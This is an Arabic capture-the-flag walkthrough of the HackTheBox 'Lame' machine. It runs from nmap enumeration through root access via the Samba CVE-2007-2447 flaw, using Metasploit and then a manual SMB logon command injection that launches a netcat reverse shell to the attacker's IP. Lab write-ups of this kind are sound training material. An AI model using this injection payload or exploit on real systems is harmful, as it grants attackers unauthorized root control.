HTB-Lame

HTB - Lame

اليوم راح نتكلم عن اول مشين من منصة هاك ذا بوكس

مشين

LAME

نظام التشغيل

لنكس

المستوى

سهل

بعد ما قمنا بتشغيل المشين نبدأ نفحص المشين عشان نعرف البورتات المفتوحة باستخدام أداة nmap

أداة Nmap (اختصار لـ Network Mapper) هي أداة مجانية ومفتوحة المصدر تستخدم لاكتشاف الشبكات ومراقبة أمن خدمات الشبكة. تتيح هذه الأداة للمستخدمين مسح الشبكات لتحديد الأجهزة المتصلة بها والخدمات التي تعمل على هذه الأجهزة، إضافة إلى أنواع أنظمة التشغيل المستخدمة والثغرات المحتملة فيها والبورتات المفتوحة.

nmap -Pn -sC -sV 10.10.10.3

شرح الامر:

Nmap:
اسم الأداة

-Pn:معاملة الجهاز انه متصل بالشبكة وعدم التحقق

sC: لاستخدام بعض
السكربتات الأساسية في الأداة

 

-sV:لمعرفة نسخة الخدمة

 سيكون هناك شرح مفصل عن الأداة قريبا

كما هو موضح لنا من نتيجة الفحص يوجد 4 بورتات مفتوحة:

البورت

الحالة

الخدمة

النسخة

21

مفتوحة

ftp

vsftpd 2.3.4

22

مفتوحة

ssh

OpenSSH 4.7p1

139

مفتوحة

netbios-ssn

Samba smbd 3.0.20

445

مفتوحة

netbios-ssn

Samba smbd 3.0.20

 

نلاحظ أيضا اننا نستطيع الدخول على خدمة الftp باستخدام اسم المستخدم وكلمة المرور Anonymous

أيضا استطاع nmap من خلال سكربت الsmb التحقق من اسم الجهاز والدومين

تعتبر هذه المرحلة من اهم المراحل وهي
مرحلة جمع المعلومات ومن المهم أيضا ان ندون جميع المعلومات التي نجدها حتى نتمكن
من استخدامها او الرجوع لها لاحقا

FTP :“بروتوكول
نقل الملفات”. بروتوكول شبكة يستخدم لنقل ملفات الكمبيوتر بين العميل والخادم
على شبكة الكمبيوتر

 

SMB يرمز
إلى
Server message Block، هو بروتوكول اتصال شبكي يستخدم لتوفير
الوصول المشترك إلى الملفات والطابعات الموجودة على الشبكة
.

 

بعد محاولة الدخول على ftp باستخدام اسم المستخدم وكلمة المرور أعلاه لم نجد شيء

 

عند محاولة استعراض الملفات المشاركة من الجهاز باستخدام smbclient

من غير استخدام اسم مستخدم او كلمة مرور استطعنا استعراض الملفات

عند تصفح tmp لم نجد معلومات او بيانات قد تساعدنا وهو المجلد الوحيد الذي نملك صلاحيات الدخول اليه

في مرحلة جمع المعلومات أيضا نبحث اذا كان هناك ثغرات او استغلالات معروفة لنسخة الخدمات الموجودة.

احدى الأدوات التي تمكننا من البحث تدعى searchsploit وهي مثبته في نظام كالي لنكس

 

ولاستخدامها نكتب اسم الأداة ثم الخدمة والنسخة 

نلاحظ وجود اكثر من استغلال والخيار
الثاني يحقق الهدف المطلوب وهو تشغيل أوامر على الجهاز يمكن استغلالها لتسمح لنا بالحصول
عل شل على الجهاز.

بعد البحث وجدنا ان هذه النسخة مصابة
بثغرة
CVE-2007-2447 ويوجد طريقتين لاستغلالها:

1-      
عن طريق ميتاسبلويت Metasploit
 ويمكن تشبيه ميتاسبلويت بالمكتبة التي تحوي العديد من الاستغلالات
الجاهزة للاستخدام.

لاستخدام ميتاسبلويت
نكتب اسم الأداة :

msfconsole

نبدأ بالبحث عن الاختراق باستخدام الامر search  متبوعا باسم الخدم ونسختها 

نلاحظ انه يحمل نفس الاسم الموجود في نتيجة searchsploit

لاستخدام الاستغلال :

use exploit/multi/samba/usermap_script

نلاحظ ظهور اسم الاستغلال باللون الاحمر 

قبل البدء بالهجوم نحتاج الى إضافة معلومات الهدف المراد اختراقه.

لمعرفة المعلومات التي يجب اضافتها نستخدم الامر :

show options

 

 

RHOST

اي بي الجهاز المراد مهاجمته

RPORT

تحديد البورت التي توجد عليها الخدمة في الجهاز المراد مهاجمته

LHOST

أي بي جهازي وفي حالة اتصالنا عن طريق الvpn الخاص بشبكة هاك ذا بوكس نضع الايبي الخاص بشبكتهم

LPORT

البورت على جهازي لاستقبال الاتصال من الجهاز المراد مهاجمته

 

 

لاضافة المعلومات نستخدم الامر set  

بعد إضافة المعلومات نقوم بتشغيل الاستغلال عن طريق الامر exploit

بعد نجاح الاستغلال أصبح لدينا تحكم بالجهاز الاخر وللتأكد نستطيع تشغيل بعض الأوامر من بيئة لنكس

للحصول على العلم من المستخدم نذهب أولا الى home للتحقق من المستخدمين الموجودين

 

نلاحظ وجود 4 مستخدمين

عند استعراض الملفات لليوزر makis  نلاحظ وجود ملف user.txt

نقوم بقراءة الملف عن طريق الامر cat

cat makis/user.txt

عند التحقق من المستخدم الحالي عن طريق الامر id

نلاحظ ان اسم المستخدم هو root  وهو الادمن في نظام اللنكس

لقراءة العلم الموجود الخاص باليوزر root نتوجه الى المجلد root

cd لتغيير المجلد

 

ls لعرض المحتويات 

نقوم بقراءة الملف باستخدام cat 

1-       الطريقة الثانية يدويا عن طريق استغلال نفس الثغرة بعد الدخول الى smb

 

أولا : ندخل الى الsmb عن طريق smbclient

ثانيا: نفتح لسنر او مستمع في الكالي باستخدام أداة nc

-l لجعله في وضع الاستماع

-p لتحديد البورت

 

-v  لطباعة حالة المستمع 

نضع الامر التالي في smb

logon “./=`nohup nc -e /bin/bash 10.10.16.21 4443`”

nc تستخدم للاتصال

-e لتشغيل الباينري /bin/bash  وهو احد أنواع الشل في اللنكس

متبوعا بالاي بي الخاص بي والبورت التي قمت بتحديدها في الخطوة الثانية

بعد ادخال الامر سيطلب منا ادخال باسوورد ويمكننا تجاهله بالضغط على انتر 

عند العودة الى المستمع في الخطوة الثانية نجد انه استقبل اتصال من الجهاز الاخر
عند تشغيل الامر id نجد نفس النتيجة السابقة في الطريقة الأولى
ويمكن من هنا الاكمال مثل الطريقة الأولى لقراءة الاعلام.

Scroll to Top